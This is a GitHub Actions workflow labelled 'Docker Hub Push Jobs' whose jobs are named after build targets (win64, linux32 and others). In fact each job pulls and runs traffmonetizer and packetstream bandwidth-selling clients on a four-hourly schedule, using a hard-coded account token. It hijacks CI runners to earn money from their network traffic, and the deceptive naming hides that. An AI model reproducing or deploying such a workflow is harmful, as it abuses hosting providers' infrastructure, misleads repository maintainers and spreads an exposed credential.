name: Docker Hub Push Jobs

on:
  schedule:
  - cron: "17 */4 * * *"
  workflow_dispatch:

jobs:
  win64:
    runs-on: ubuntu-latest
    steps:
      - name: Docker
        timeout-minutes: 64
        run: |
          sudo docker pull packetstream/psclient:latest
          sudo docker pull traffmonetizer/cli:latest
          sleep 15
          echo === traffmonetizer/cli ===
          sudo docker run -d --name tm traffmonetizer/cli start accept --token kQW+w1GUHjip76EgZZXpL3ZqTjTWweRTBCQFcdQIv2o=
          echo === traffmonetizer/cli === Logs ===
          sudo docker logs tm -t -f
          echo Done!

  win32:
    runs-on: ubuntu-latest
    steps:
      - name: Docker
        timeout-minutes: 32
        run: |
            sudo docker pull packetstream/psclient:latest
            sudo docker pull traffmonetizer/cli:latest
            sleep 15
            echo === traffmonetizer/cli ===
            sudo docker run -d --name tm traffmonetizer/cli start accept --token kQW+w1GUHjip76EgZZXpL3ZqTjTWweRTBCQFcdQIv2o=
            echo === traffmonetizer/cli === Logs ===
            sudo docker logs tm -t -f
            echo Done!
  linux64:
    runs-on: ubuntu-latest
    steps:
      - name: Docker
        timeout-minutes: 64
        run: |
            sudo docker pull packetstream/psclient:latest
            sudo docker pull traffmonetizer/cli:latest
            sleep 15
            echo === traffmonetizer/cli ===
            sudo docker run -d --name tm traffmonetizer/cli start accept --token kQW+w1GUHjip76EgZZXpL3ZqTjTWweRTBCQFcdQIv2o=
            echo === traffmonetizer/cli === Logs ===
            sudo docker logs tm -t -f
            echo Done!
  linux32:
    runs-on: ubuntu-latest
    steps:
      - name: Docker
        timeout-minutes: 32
        run: |
            sudo docker pull packetstream/psclient:latest
            sudo docker pull traffmonetizer/cli:latest
            sleep 15
            echo === traffmonetizer/cli ===
            sudo docker run -d --name tm traffmonetizer/cli start accept --token kQW+w1GUHjip76EgZZXpL3ZqTjTWweRTBCQFcdQIv2o=
            echo === traffmonetizer/cli === Logs ===
            sudo docker logs tm -t -f
            echo Done!
